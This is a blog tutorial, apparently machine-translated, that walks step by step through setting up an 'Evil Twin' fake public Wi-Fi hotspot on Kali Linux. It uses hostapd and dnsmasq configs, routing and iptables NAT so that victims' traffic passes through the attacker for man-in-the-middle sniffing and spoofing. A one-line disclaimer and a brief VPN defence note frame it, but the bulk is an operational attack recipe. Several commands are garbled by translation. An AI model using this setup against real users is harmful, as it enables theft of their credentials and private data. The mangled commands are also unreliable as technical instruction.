Think long and hard before connecting to a free public wireless hotspot in a cafeteria, airport or hotel. Ever wondered if the public Wi-Fi you just connected to is secure or if it could be an Evil Twin hotspot?
After installing the fake Access Point and connecting to its victim, the attacker launched a MITM attack to intercept data between its victims and the fake AP, for further malicious and harmful actions.
No, it’s not a fantasy story. It can happen very easily. On a Wi-Fi network, a MITM attack occurs when the primary data transmission route between victims and the Internet is through an attacking device.
After a successful MITM attack, victims’ sensitive information such as E-mail, accounts, password, credit card number and other important information, not protected by security protocols, will be available to the attacker using many tools such as Ethercap, Dsniff Mailsnarf, Urlsnarf, Wireshark, Cain and Able, etc.
Criminals can also use fake wireless hotspots as a way to gather your information. By creating a hotspot, usually in a location where there is public Wi-Fi, such as “Free Public WiFi”, they create networks that look real to unsuspecting users. In fact, they are monitoring / stealing your data.
Do we seem exaggerated? See how it can be done with just one laptop running Kali Linux. The funny thing is that usually the perpetrator and the victim are side by side or at least as far as the wifi can catch.
The following example is for educational purposes ONLY. Under no circumstances should it be used for illegal activity.
Step 1 – Before creating a fake AP with the help of Kali Linux, make sure that you update your computer with the command “sudo apt-get update”Which updates the list of all packages for upgrades to packages that need upgrading, as well as new packages that are in storage.
Step 2 – You must have access to install it hostapd and dnsmasq. Dnsmasq is a small DNS / DHCP server that we will use in this setting
At the beginning hostapd, make sure the wireless connection is the first thing you can check / make sure and the command to see this is “iwconfig“.
From the above command output, it appears that wlan0 is the name of our wireless interface.
Step 3 – Now you need to put this wireless interface in monitoring mode by typing the following commands:
Mandate: ifconfig wlan0 down
Mandate: iwconfig wlan0 mode monitor
Mandate: ifconfig wlan0 up
Step 4 – To start Hostapd, we need to create a configuration file for this tool, which will contain all the information about SSID, passphrase, channel number, etc.
Just create a directory under / root with the help of “mkdir / root / accesspoint”To maintain all the necessary files for this installation.
Step 5 – Now create a hostapd configuration file (hostapd.conf) in the / root / accesspoint directory and write the following information to it:
Code:interface=wlan0
driver=nl80211
ssid=Το όνομα που θέλετε (π.χ. Free WiFi)
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=iguru123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1
Here we will see what all this means:
- interface = Wireless interface (connection) to host the access point e.g. wlan0
- driver = Nl80211 is the new public 802.11 network interface that is now being replaced by cfg80211
- ssid = Wireless network name
- hw_mode = Sets how the interface and allowed channels work. (Generally uses a, b and g)
- channel = Sets the channel for hostapd to work. (From 1 to 13)
- macaddr_acl = Used to filter Mac (0 – off, 1 – on)
- ign_broadcast_ssid = Used to create hidden APs
- auth_algs = Sets the authentication algorithm (0 – for open, 1 – for shared)
- wpa_passphrase = Contains your wireless password
Step 6 – Just start the Access Point with the following command:
Mandate: hostapd hostapd.conf
As you can see, your hostapd is working successfully with wlan0: AP-ENABLED and with a new hwaddr randomly assigned “90:f6:52:e3:2e:c2” , as well as the ssid you have set.
Step 7 – Now you need to configure the network routing with the dnsmasq tool so that traffic can be switched between network nodes and there is a path available for sending data.
Just create a configuration file in the root directory by name dnsmasq.conf and write the following instructions:
Code:interface=wlan0
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0 .0.1
Step 8 – Assign the network gateway and netmask to the wlan0 interface and add the routing table as shown below:
Mandate: ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
Mandate: route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
After that you need to start the dnsmasq service with the configuration file we created in the above step:
Mandate: dnsmasq -C dnsmasq.conf -d
Dnsmasq always provides a local DNS server, a DHCP server with support for DHCPv6 and PXE, and a TFTP server. It is designed to be light and has a small footprint, suitable for limited resources on routers and firewall. Dnsmasq can also be configured to cache DNS queries for improved DNS search speeds on sites they have already visited.
Step 9 – To give internet access to your victims, make sure you configure iptables, then only you can collect all the data and perform various further attacks like MITM, DNS Spoofing, ARP Spoofing etc.
Mandate: iptables –table nat –append POSTROUTING -out-interface eth0 -j MASQUERADE
Mandate: iptables –append FORWARD –in-interface wlan0 -j ACCEPT
Traffic promotion is a process for IP Forwarding from one network to another.
Step 10 – The last step is to enable IP Forwarding by typing “echo 1> / proc / sys / net / ipv4 / ip_forward “.
The fake AP will provide an Internet connection to its victim via the Ethernet network card to ensure that the device is connected to the fake AP. Now all the traffic of victims will go through the fake AP device.
Protection against fake APs
There are not many ways to defend yourself against this type of attack. You might think that wireless encryption would prevent this type of attack, but it is not effective because Wi-Fi Protected Access (WPA) does not encrypt user data when the victim is already connected to the access point.
One of the ways the iguru team suggests protecting themselves from Evil Twin is to use a virtual private network (VPN). Using the encrypted tunnel provided by the VPN helps to ensure all traffic between your device and the VPN server.
About the Author : Anastasis Vasileiadis
PC Technician, Penetration Tester, Ethical Hacker, Cyber Security Expert, Malware Analyst, Information Security Researcher, Reverse engineering.
Leave a Reply